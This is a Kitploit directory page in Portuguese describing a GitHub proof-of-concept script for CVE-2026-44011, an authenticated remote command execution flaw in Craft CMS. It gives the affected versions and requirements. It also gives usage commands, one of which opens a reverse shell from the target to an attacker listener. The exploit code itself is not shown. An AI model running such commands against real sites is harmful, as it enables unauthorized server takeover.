Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-44011-poc — PoC de RCE autenticado no Craft CMS para CVE-2026-44011 | Kitploit
Ferramentas/GitHubGitHub/dennisdgr/cve-2026-44011-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoSegurança WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubdennisdgr/cve-2026-44011-poc

CVE-2026-44011-poc

PoC de RCE autenticado no Craft CMS para CVE-2026-44011

Ver Repositório
4há 3 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-44011: PoC de RCE autenticado no Craft CMS

Este script Python adapta o ataque descrito no aviso de segurança do Craft CMS. Um usuário autenticado do Craft pode alcançar um caminho vulnerável de configuração de layout de campos e fazer com que o servidor execute comandos.

Escopo e requisitos

As versões afetadas são Craft CMS >=4.0.0, <4.17.12 e >=5.0.0, <5.9.18.

O script requer curl em ambos os hosts. Ele usa Bash no servidor. O Python3 no servidor também fornece um PTY interativo; sem ele, o shell recorre a uma conexão básica.

Uso

# Confirm the host is vulnerable
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password' --check

# Open an interactive shell
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password'

Créditos

O Craft CMS credita @precicom-vincent-tl como o descobridor da CVE-2026-44011. Os detalhes da vulnerabilidade e o payload de exemplo estão publicados no aviso do Craft CMS GHSA-qrgm-p9w5-rrfw. Este script adapta essa técnica publicada.

Baixar ferramenta